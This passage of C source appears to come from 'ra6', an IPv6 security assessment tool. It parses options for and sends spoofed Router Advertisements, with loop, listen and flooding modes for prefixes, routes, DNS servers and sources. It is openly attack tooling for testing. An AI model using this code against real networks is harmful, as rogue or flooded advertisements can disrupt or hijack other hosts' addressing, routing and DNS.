required_argument, 0, 'D'}, {"flood-prefixes", required_argument, 0, 'f'}, {"flood-sources", required_argument, 0, 'F'}, {"flood-routes", required_argument, 0, 'w'}, {"flood-dns", required_argument, 0, 'W'}, {"block-src-addr", required_argument, 0, 'j'}, {"block-dst-addr", required_argument, 0, 'k'}, {"block-link-src-addr", required_argument, 0, 'J'}, {"block-link-dst-addr", required_argument, 0, 'K'}, {"accept-src-addr", required_argument, 0, 'b'}, {"accept-dst-addr", required_argument, 0, 'g'}, {"accept-link-src-addr", required_argument, 0, 'B'}, {"accept-link-dst-addr", required_argument, 0, 'G'}, {"loop", no_argument, 0, 'l'}, {"sleep", required_argument, 0, 'z'}, {"listen", no_argument, 0, 'L'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'}, {0, 0, 0, 0 } }; char shortopts[]= "i:s:d:A:u:U:H:y:c:t:r:x:moaqp:E:eP:R:M:N:S:D:f:F:w:W:lz:Lj:k:J:K:b:g:B:G:vh"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } hoplimit=255; curhop=255; prefbits= DEFAULT_ROUTER_PREFERENCE; preference= prefbits>>3; lifetime= DEFAULT_ROUTER_LIFETIME; reachable= DEFAULT_ROUTER_REACHABLE; retrans= DEFAULT_ROUTER_RETRANS; srandom(time(NULL)); /* Initialize filters structure */ if(init_filters(&filters) == -1){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } if(init_iface_data(&idata) == FAILURE){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option= r; switch(option) { case 'i': /* Interface */ strncpy(idata.iface, optarg, IFACE_LENGTH-1); idata.iface[IFACE_LENGTH-1]=0; idata.ifindex= if_nametoindex(idata.iface); idata.iface_f=TRUE; break; case 's': /* IPv6 Source Address */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in '-s' (IPv6 Source Address) option"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &(idata.srcaddr)) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } idata.srcaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ idata.srcpreflen = atoi(charptr); if(idata.srcpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&(idata.srcaddr), idata.srcpreflen); idata.srcprefix_f=1; } break; case 'd': /* IPv6 Destination Address */ strncpy( targetipv6.name, optarg, NI_MAXHOST); targetipv6.name[NI_MAXHOST-1]= 0; targetipv6.flags= AI_CANONNAME; if( (r=get_ipv6_target(&targetipv6)) != 0){ if(r < 0){ printf("Unknown Destination: %s\n", gai_strerror(targetipv6.res)); } else{ puts("Unknown Destination: No IPv6 address found for specified destination"); } exit(1); } idata.dstaddr= targetipv6.ip6; idata.dstaddr_f = 1; break; case 'A': /* Hop Limit */ hoplimit= atoi(optarg); hoplimit_f=1; break; case 'y': /* Fragment header */ nfrags= atoi(optarg); if(nfrags < 8){ puts("Error in Fragmentation option: Fragment Size must be at least 8 bytes"); exit(EXIT_FAILURE); } nfrags = (nfrags +7) & 0xfff8; idata.fragh_f= 1; break; case 'u': /* Destinations Options Header */ if(ndstopthdr >= MAX_DST_OPT_HDR){ puts("Too many Destination Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstopthdrlen[ndstopthdr]= hdrlen; if( (dstopthdr[ndstopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header"); exit(EXIT_FAILURE); } ptrhdr= dstopthdr[ndstopthdr] + 2; ptrhdrend= dstopthdr[ndstopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr= ptrhdr + pad; } *(dstopthdr[ndstopthdr]+1)= (hdrlen/8)-1; ndstopthdr++; dstopthdr_f=1; break; case 'U': /* Destination Options Header (Unfragmentable Part) */ if(ndstoptuhdr >= MAX_DST_OPT_U_HDR){ puts("Too many Destination Options Headers (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstoptuhdrlen[ndstoptuhdr]= hdrlen; if( (dstoptuhdr[ndstoptuhdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } ptrhdr= dstoptuhdr[ndstoptuhdr]+2; ptrhdrend= dstoptuhdr[ndstoptuhdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header (Unfragmentable Part) Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(dstoptuhdr[ndstoptuhdr]+1)= (hdrlen/8) - 1; ndstoptuhdr++; dstoptuhdr_f=1; break; case 'H': /* Hop-by-Hop Options Header */ if(nhbhopthdr >= MAX_HBH_OPT_HDR){ puts("Too many Hop-by-Hop Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; hbhopthdrlen[nhbhopthdr]= hdrlen; if( (hbhopthdr[nhbhopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } ptrhdr= hbhopthdr[nhbhopthdr] + 2; ptrhdrend= hbhopthdr[nhbhopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Hop-by-Hop Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(hbhopthdr[nhbhopthdr]+1)= (hdrlen/8) - 1; nhbhopthdr++; hbhopthdr_f=1; break; case 'S': /* Source Ethernet address */ idata.hsrcaddr_f = 1; if(ether_pton(optarg, &(idata.hsrcaddr), sizeof(idata.hsrcaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } break; case 'D': /* Destination Ethernet Address */ idata.hdstaddr_f = 1; if(ether_pton(optarg, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } break; case 'c': /* CurHop value */ curhop = abs(atoi(optarg)); break; case 'm': /* "Managed" bit */ managed_f = ND_RA_FLAG_MANAGED; break; case 'o': /* "Other" bit */ other_f = ND_RA_FLAG_OTHER; break; case 'a': /* "Home Agent" bit */ home_f = ND_RA_FLAG_HOME_AGENT; break; case 'q': /* ND Proxy bit */ proxy_f= ND_RA_FLAG_ND_PROXY; break; case 'p': /* "Preference" bits */ preference= atoi(optarg); if(preference<-2 || preference >1){ puts("Error in 'preference' parameter"); exit(EXIT_FAILURE); } prefbits = (preference << 3) & 0x18; break; case 't': /* Router Lifetime */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'lifetime' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg) lifetime = ul_res; break; case 'r': /* Reachable Time */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'reachable' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg) reachable = ul_res; break; case 'x': /* Retrans Time */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'retransmit' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg) retrans = ul_res; break; case 'E': /* Source link-layer option */ sllopt_f = 1; if(ether_pton(optarg, &linkaddr[nlinkaddr], sizeof(struct ether_addr)) == 0){ puts("Error in Source link-layer address option."); exit(EXIT_FAILURE); } sllopta_f=1; nlinkaddr++; break; case 'e': /* Add Source link-layer option */ sllopt_f = 1; break; case 'P': /* Prefix Information option */ if(nprefixes >= MAX_PREFIX_OPTION){ puts("Too many Prefix Options"); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in prefix option number %u. \n", nprefixes+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &prefix[nprefixes]) <= 0){ printf("Error in prefix option number %u. ", nprefixes+1); perror("inet_pton():"); exit(EXIT_FAILURE); } if((preflen= strtok_r(NULL, "#", &lasts)) == NULL){ printf("Length error in prefix option number %u.\n", nprefixes+1); exit(EXIT_FAILURE); } prefixlen[nprefixes] = atoi(preflen); if(prefixlen[nprefixes]>128){ printf("Length error in prefix option number %u.\n", nprefixes+1); exit(EXIT_FAILURE); } prefixflags[nprefixes]=0; prefixpref[nprefixes] = DEFAULT_PREFIX_PREFERRED; prefixvalid[nprefixes] = DEFAULT_PREFIX_VALID; if((prefflags= strtok_r(NULL, "#", &lasts)) == NULL){ nprefixes++; prefopt_f=1; break; } while(*prefflags){ if(*prefflags == 'L') prefixflags[nprefixes] = prefixflags[nprefixes] | ND_OPT_PI_FLAG_ONLINK; else if(*prefflags == 'A') prefixflags[nprefixes] = prefixflags[nprefixes] | ND_OPT_PI_FLAG_AUTO; else if(*prefflags == 'R') prefixflags[nprefixes] = prefixflags[nprefixes] | ND_OPT_PI_FLAG_RADDR; else if(*prefflags == '-') break; else{ printf("Flags error in prefix option number %u\n", nprefixes+1); exit(EXIT_FAILURE); } prefflags++; } if((prefvalid= strtok_r(NULL, "#", &lasts)) == NULL){ nprefixes++; prefopt_f=1; break; } if((ul_res = strtoul(prefvalid, &endptr, 0)) == ULONG_MAX){ printf("Error in prefix option number %u. ", nprefixes+1); perror("strtoul()"); exit(EXIT_FAILURE); } if(endptr != optarg){ prefixvalid[nprefixes] = ul_res; } else{ nprefixes++; prefopt_f=1; break; } if((prefpref= strtok_r(NULL, "#", &lasts)) == NULL){ nprefixes++; prefopt_f=1; break; } if((ul_res = strtoul(prefpref, &endptr, 0)) == ULONG_MAX){ printf("Error in prefix option number %u. ", nprefixes+1); perror("strtoul()"); exit(EXIT_FAILURE); } if(endptr != prefpref) prefixpref[nprefixes] = ul_res; nprefixes++; prefopt_f=1; break; case 'R': /* Route Information option */ if(nroutes >= MAX_ROUTE_OPTION){ puts("Too many Route Information Options"); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in Route Information option number %u. \n", nroutes+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &route[nroutes]) <= 0){ printf("Error in Route Information option number %u.\n", nroutes+1); perror("inet_pton():"); exit(EXIT_FAILURE); } if((preflen= strtok_r(NULL, "#", &lasts)) == NULL){ printf("Length error in Route Information option number %u.\n", nroutes+1); exit(EXIT_FAILURE); } routelen[nroutes] = atoi(preflen); if(routelen[nroutes]>128){ printf("Length error in Route Information option number %u.\n", nroutes+1); exit(EXIT_FAILURE); } routepref[nroutes] = DEFAULT_ROUTE_OPT_PREF; routelife[nroutes]= DEFAULT_ROUTE_OPT_LIFE; if((rpref = strtok_r(NULL, "#", &lasts)) == NULL){ nroutes++; break; } routepref[nroutes]= atoi(rpref); routepref[nroutes] = (routepref[nroutes]<<3) & 0x18; if((ul_res = strtoul(lasts, &endptr, 0)) == ULONG_MAX){ printf("Error in 'lifetime' parameter of Route Information option number %u\n", \ nroutes+1); exit(EXIT_FAILURE); } if(endptr != lasts) routelife[nroutes]= ul_res; nroutes++; break; case 'N': /* Recursive DNS Server option */ if(nrdnss >= MAX_RDNSS_OPTION){ puts("Too many Recursive DNS Server"); exit(EXIT_FAILURE); } if((charptr = strtok_r(optarg, "#", &lasts)) == NULL){ printf("Error in Recursive DNS Server option number %u. \n", nrdnss+1); exit(EXIT_FAILURE); } if((ul_val = strtoul(charptr, &endptr, 0)) == ULONG_MAX){ printf("Error in 'lifetime' parameter of Recursive DNS Server option number %u\n",\ nrdnss+1); exit(EXIT_FAILURE); } if(endptr == charptr){ printf("Error in Recursive DNS Server option number %u. \n", nrdnss+1); exit(EXIT_FAILURE); } rdnsslife[nrdnss]= ul_val; nrdnssopt[nrdnss]= 0; while(nrdnssopt[nrdnss]< MAX_RDNSS_OPT_ADDRS && (charptr = strtok_r(NULL, "#", &lasts)) != NULL){ if ( inet_pton(AF_INET6, charptr, &rdnss[nrdnss][nrdnssopt[nrdnss]]) <= 0){ printf("Error in address #%u of Recursive DNS Server option number %u.\n", \ nrdnssopt[nrdnss]+1, nrdnss+1); perror("inet_pton():"); exit(EXIT_FAILURE); } nrdnssopt[nrdnss]++; } nrdnss++; break; case 'M': /* MTU option */ mtu[nmtu]= atoi(optarg); nmtu++; break; case 'w': /* Flood Routes */ nfloodr= atoi(optarg); floodr_f= 1; break; case 'f': /* Flood prefixes */ nfloodp= atoi(optarg); floodp_f= 1; break; case 'F': /* Flood sources */ nsources= atoi(optarg); if(nsources == 0){ puts("Invalid number of sources in option -F"); exit(EXIT_FAILURE); } floods_f= 1; break; case 'W': /* Flood DNS */ if((charptr = strtok_r(optarg, "#", &lasts)) == NULL){ puts("Error in option '-k'"); exit(EXIT_FAILURE); } nfloodda = atoi(charptr); if((charptr = strtok_r(NULL, "#", &lasts)) == NULL){ nflooddoa=127; } else{ nflooddoa=atoi(charptr); if(nfloodda>MAX_RDNSS_OPT_ADDRS){ puts("Error in '-k' option: Number of addresses per option exceeds 127"); exit(EXIT_FAILURE); } } floodd_f= 1; break; case 'L': /* "Listen mode */ listen_f = 1; break; case 'j': /* IPv6 Source Address (block) filter */ if(filters.nblocksrc >= MAX_BLOCK_SRC){ puts("Too many IPv6 Source Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blocksrc[filters.nblocksrc])) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blocksrclen[filters.nblocksrc] = 128; } else{ filters.blocksrclen[filters.nblocksrc] = atoi(charptr); if(filters.blocksrclen[filters.nblocksrc]>128){ printf("Length error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blocksrc[filters.nblocksrc]), filters.blocksrclen[filters.nblocksrc]); (filters.nblocksrc)++; break; case 'k': /* IPv6 Destination Address (block) filter */ if(filters.nblockdst >= MAX_BLOCK_DST){ puts("Too many IPv6 Destination Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Destination Address (block) filter number %u.\n", \ filters.nblockdst+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blockdst[filters.nblockdst])) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", \ filters.nblockdst+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blockdstlen[filters.nblockdst] = 128; } else{ filters.blockdstlen[filters.nblockdst] = atoi(charptr); if(filters.blockdstlen[filters.nblockdst]>128){ printf("Length error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblockdst+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blockdst[filters.nblockdst]), filters.blockdstlen[filters.nblockdst]); (filters.nblockdst)++; break; case 'J': /* Link Source Address (block) filter */ if(filters.nblocklinksrc > MAX_BLOCK_LINK_SRC){ puts("Too many link-layer Source Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.blocklinksrc[filters.nblocklinksrc]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Source Address (blick) filter number %u.\n", \ filters.nblocklinksrc+1); exit(EXIT_FAILURE); } (filters.nblocklinksrc)++; break; case 'K': /* Link Destination Address (block) filter */ if(filters.nblocklinkdst > MAX_BLOCK_LINK_DST){ puts("Too many link-layer Destination Address (block) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.blocklinkdst[filters.nblocklinkdst]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Destination Address (blick) filter number %u.\n", \ filters.nblocklinkdst+1); exit(EXIT_FAILURE); } filters.nblocklinkdst++; break; case 'b': /* IPv6 Source Address (accept) filter */ if(filters.nacceptsrc > MAX_ACCEPT_SRC){ puts("Too many IPv6 Source Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.acceptsrc[filters.nacceptsrc])) <= 0){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.acceptsrclen[filters.nacceptsrc] = 128; } else{ filters.acceptsrclen[filters.nacceptsrc] = atoi(charptr); if(filters.acceptsrclen[filters.nacceptsrc]>128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.acceptsrc[filters.nacceptsrc]), filters.acceptsrclen[filters.nacceptsrc]); (filters.nacceptsrc)++; filters.acceptfilters_f=1; break; case 'g': /* IPv6 Destination Address (accept) filter */ if(filters.nacceptdst > MAX_ACCEPT_DST){ puts("Too many IPv6 Destination Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Destination Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.acceptdst[filters.nacceptdst])) <= 0){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.acceptdstlen[filters.nacceptdst] = 128; } else{ filters.acceptdstlen[filters.nacceptdst] = atoi(charptr); if(filters.acceptdstlen[filters.nacceptdst] > 128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.acceptdst[filters.nacceptdst]), filters.acceptdstlen[filters.nacceptdst]); (filters.nacceptdst)++; filters.acceptfilters_f=1; break; case 'B': /* Link-layer Source Address (accept) filter */ if(filters.nacceptlinksrc > MAX_ACCEPT_LINK_SRC){ puts("Too many link-later Source Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.acceptlinksrc[filters.nacceptlinksrc]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Source Address (accept) filter number %u.\n", \ filters.nacceptlinksrc+1); exit(EXIT_FAILURE); } (filters.nacceptlinksrc)++; filters.acceptfilters_f=1; break; case 'G': /* Link Destination Address (accept) filter */ if(filters.nacceptlinkdst > MAX_ACCEPT_LINK_DST){ puts("Too many link-layer Destination Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.acceptlinkdst[filters.nacceptlinkdst]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Destination Address (accept) filter number %u.\n",\ filters.nacceptlinkdst+1); exit(EXIT_FAILURE); } (filters.nacceptlinkdst)++; filters.acceptfilters_f=1; break; case 'l': /* "Loop mode */ loop_f = 1; break; case 'z': /* Sleep option */ nsleep=atoi(optarg); if(nsleep==0){ puts("Invalid number of seconds in '-z' option"); exit(EXIT_FAILURE); } sleep_f=1; break; case 'v': /* Be verbose */ idata.verbose_f++; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ if(geteuid()) { puts("ra6 needs root privileges to run."); exit(EXIT_FAILURE); } if(!idata.iface_f){ puts("Must specify the network interface with the -i option"); exit(EXIT_FAILURE); } if(load_dst_and_pcap(&idata, LOAD_PCAP_ONLY) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } release_privileges(); if( pcap_datalink(idata.pfd) != DLT_EN10MB){ printf("Error: Interface %s is not an Ethernet interface", idata.iface); exit(EXIT_FAILURE); } if(pcap_compile(idata.pfd, &pcap_filter, PCAP_ICMPV6_RS_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); /* If the IPv6 Source Address has not been specified, and the "-F" (flood) option has not been specified, select a random link-local unicast address. */ if(!(idata.srcaddr_f) && !floods_f){ /* When randomizing a link-local IPv6 address, select addresses that belong to the prefix fe80::/64 (that's what a link-local address looks-like in legitimate cases). The KAME implementation discards addresses in which the second high-order 16 bits (srcaddr.s6_addr16[1] in our case) are not zero. */ if(idata.ip6_local_flag){ idata.srcaddr= idata.ip6_local; } else{ if ( inet_pton(AF_INET6, "fe80::", &(idata.srcaddr)) <= 0){ puts("inet_pton(): Error when converting address"); exit(EXIT_FAILURE); } randomize_ipv6_addr(&(idata.srcaddr), &(idata.srcaddr), 64); } } /* If the flood option ("-F") has been specified, but no prefix has been specified, select the random Source Addresses from the link-local unicast prefix (fe80::/64). */ if(floods_f && !idata.srcprefix_f){ if ( inet_pton(AF_INET6, "fe80::", &(idata.srcaddr)) <= 0){ puts("inet_pton(): Error when converting address"); exit(EXIT_FAILURE); } randomize_ipv6_addr(&(idata.srcaddr), &(idata.srcaddr), 64); idata.srcpreflen=64; } if(!idata.dstaddr_f) /* Destination Address defaults to all-nodes (ff02::1) */ if( inet_pton(AF_INET6, ALL_NODES_MULTICAST_ADDR, &(idata.dstaddr)) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } if(!idata.hdstaddr_f) /* Destination link-layer address defaults to all-nodes */ if(ether_pton(ETHER_ALLNODES_LINK_ADDR, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("ether_pton(): Error converting all-nodes multicast address"); exit(EXIT_FAILURE); } if(sllopt_f && !sllopta_f){ /* The value of the source link-layer address option */ linkaddr[0]= idata.hsrcaddr; /* defaults to the source Ethernet address */ nlinkaddr++; } if(floodp_f){ if(nfloodp == 0){ puts("Invalid number of prefix options in option -f"); exit(EXIT_FAILURE); } if(!nprefixes){ prefixlen[0] = 64; prefixflags[0]= ND_OPT_PI_FLAG_ONLINK | ND_OPT_PI_FLAG_AUTO; prefixpref[0] = DEFAULT_PREFIX_PREFERRED; prefixvalid[0] = DEFAULT_PREFIX_VALID; } nprefixes=nfloodp; } if(floodr_f){ if(nfloodr == 0){ puts("Invalid number of route options in option -f"); exit(EXIT_FAILURE); } if(!nroutes){ routelen[0] = 64; /* By default, flood with /64s */ routepref[0]= DEFAULT_ROUTE_OPT_PREF; routelife[0] = DEFAULT_ROUTE_OPT_LIFE; } nroutes=nfloodr; } if(!floods_f) nsources=1; if(floodd_f){ if(!nrdnss) rdnsslife[0]= DEFAULT_RDNSS_LIFETIME; nrdnss=nfloodda; } if(!sleep_f) nsleep=1; if( !idata.fragh_f && dstoptuhdr_f){ puts("Dst. Options Header (Unfragmentable Part) set, but Fragmentation not specified"); exit(EXIT_FAILURE); } if(idata.verbose_f){ print_attack_info(&idata); } /* Set initial contents of the attack packet */ init_packet_data(&idata); /* Fire an unsolicited Router Advertisement if a target IPv6 address or a target Ethernet * address were specified */ if(idata.dstaddr_f || idata.hdstaddr_f){ send_packet(&idata, NULL); if(idata.verbose_f) puts("Initial attack packet(s) sent successfully."); if(loop_f){ if(idata.verbose_f) printf("Now sending Router Advertisements every %u second%s...\n", nsleep, ((nsleep>1)?"s":"")); while(loop_f){ sleep(nsleep); send_packet(&idata, NULL); } exit(EXIT_SUCCESS); } } if(listen_f){ if(idata.verbose_f) puts("Listening to incoming ICMPv6 Router Solicitation messages..."); FD_ZERO(&sset); FD_SET(idata.fd, &sset); while(listen_f){ rset= sset; #if defined(sun) || defined(__sun) || defined(__linux__) timeout.tv_usec=10000; timeout.tv_sec= 0; if((sel=select(idata.fd+1, &rset, NULL, NULL, &timeout)) == -1){ #else if((sel=select(idata.fd+1, &rset, NULL, NULL, NULL)) == -1){ #endif if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } #if defined(sun) || defined(__sun) || defined(__linux__) if(TRUE){ #else if(FD_ISSET(idata.fd, &rset)){ #endif /* Read a Router Solicitation message */ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 1 && pktdata != NULL){ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + ETHER_HDR_LEN); pkt_rs = (struct nd_router_solicit *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); accepted_f=0; if(idata.type == DLT_EN10MB && !(idata.flags & IFACE_LOOPBACK)){ if(filters.nblocklinksrc){ if(match_ether(filters.blocklinksrc, filters.nblocklinksrc, &(pkt_ether->src))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblocklinkdst){ if(match_ether(filters.blocklinkdst, filters.nblocklinkdst, &(pkt_ether->dst))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } } if(filters.nblocksrc){ if(match_ipv6(filters.blocksrc, filters.blocksrclen, filters.nblocksrc, &(pkt_ipv6->ip6_src))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblockdst){ if(match_ipv6(filters.blockdst, filters.blockdstlen, filters.nblockdst, &(pkt_ipv6->ip6_dst))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(idata.type == DLT_EN10MB && !(idata.flags & IFACE_LOOPBACK)){ if(filters.nacceptlinksrc){ if(match_ether(filters.acceptlinksrc, filters.nacceptlinksrc, &(pkt_ether->src))) accepted_f=1; } if(filters.nacceptlinkdst && !accepted_f){ if(match_ether(filters.acceptlinkdst, filters.nacceptlinkdst, &(pkt_ether->dst))) accepted_f= 1; } } if(filters.nacceptsrc && !accepted_f){ if(match_ipv6(filters.acceptsrc, filters.acceptsrclen, filters.nacceptsrc, &(pkt_ipv6->ip6_src))) accepted_f= 1; } if(filters.nacceptdst && !accepted_f){ if(match_ipv6(filters.acceptdst, filters.acceptdstlen, filters.nacceptdst, &(pkt_ipv6->ip6_dst))) accepted_f=1; } if(filters.acceptfilters_f && !accepted_f){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } if(idata.verbose_f>1) print_filter_result(&idata, pktdata, ACCEPTED); /* Send a Router Advertisement */ send_packet(&idata, pktdata); } } } } if(!(idata.dstaddr_f || idata.hdstaddr_f) && !listen_f){ puts("Error: Nothing to send!"); exit(EXIT_FAILURE); } exit(EXIT_SUCCESS); } /* * Function: init_packet_data() * * Initialize the contents of the attack packet (Ethernet header, IPv6 Header, and ICMPv6 header) * that are expected to remain constant for the specified attack. */ void init_packet_data(struct iface_data *idata){ struct dlt_null *dlt_null; ethernet= (struct ether_header *) buffer; dlt_null= (struct dlt_null *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->type == DLT_EN10MB){ ethernet->ether_type = htons(ETHERTYPE_IPV6); if(!(idata->flags & IFACE_LOOPBACK)){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; } } else if(idata->type == DLT_NULL){ dlt_null->family= PF_INET6; } #if defined (__OpenBSD__) else if(idata->type == DLT_LOOP){ dlt_null->family= htonl(PF_INET6); } #endif ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if(hbhopthdr_f){ hbhopthdrs=0; while(hbhopthdrs < nhbhopthdr){ if((ptr+ hbhopthdrlen[hbhopthdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing HBH Opt. Header"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_HOPOPTS; prev_nh = ptr; memcpy(ptr, hbhopthdr[hbhopthdrs], hbhopthdrlen[hbhopthdrs]); ptr = ptr + hbhopthdrlen[hbhopthdrs]; hbhopthdrs++; } } if(dstoptuhdr_f){ dstoptuhdrs=0; while(dstoptuhdrs < ndstoptuhdr){ if((ptr+ dstoptuhdrlen[dstoptuhdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing Dest. Opt. Header (Unfrag. Part)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; 